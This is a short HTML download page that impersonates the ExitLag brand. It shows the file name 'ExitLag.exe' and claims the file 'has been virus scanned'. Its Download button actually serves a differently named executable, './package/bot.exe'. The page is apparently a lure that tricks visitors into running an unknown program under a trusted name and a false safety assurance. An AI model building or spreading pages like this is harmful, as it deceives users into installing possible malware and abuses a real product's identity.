<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ExitLag Download</title>
    <style>
        :root {
            --exl-accent: #EC4046;
            --exl-footer-accent: #EC4046;
        }
        
        body {
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Arial, sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
            background-color: #f5f5f7;
            position: relative;
        }
        .container {
            text-align: center;
            padding: 2rem;
        }
        .logo-container {
            position: absolute;
            top: 20px;
            left: 20px;
            height: auto;
            background-color: transparent;
        }
        .logo-text {
            color: var(--exl-footer-accent);
            font-weight: 400;
            font-family: "Organetto", sans-serif;
            text-transform: uppercase !important;
            font-size: 1.5rem;
            margin: 0;
        }
        .file-icon {
            width: 80px;
            height: 80px;
            margin-bottom: 1rem;
            display: block;
            margin-left: auto;
            margin-right: auto;
        }
        .file-icon img {
            width: 100%;
            height: 100%;
            object-fit: contain;
        }
        .file-name {
            font-size: 1.25rem;
            font-weight: 500;
            margin-bottom: 1.0rem;
            color: #1d1d1f;
        }
        .file-description {
            color: #86868b;
            margin-bottom: 2rem;
            font-size: 0.9rem;
        }
        .download-button {
            background-color: var(--exl-accent) !important;
            color: #FFFFFF;
            border: 1px solid var(--exl-accent) !important;
            border-radius: 4px;
            padding: 8px 50px;
            font-size: 1.0rem;
            cursor: pointer;
            transition: all 0.2s;
            outline: none !important;
        }
    </style>
</head>
<body>
    <div class="logo-container">
        <h1 class="logo-text">exitlag</h1>
    </div>
    <div class="container">
        <div class="file-icon">
            <img src="./static/symbol.svg" alt="Executable File">
        </div>
        <div class="file-name">ExitLag.exe</div>
        <div class="file-description">This file has been virus scanned, please download</div>
        <a href="./package/bot.exe" download="bot.exe">
            <button class="download-button">Download</button>
        </a>
    </div>
</body>
</html>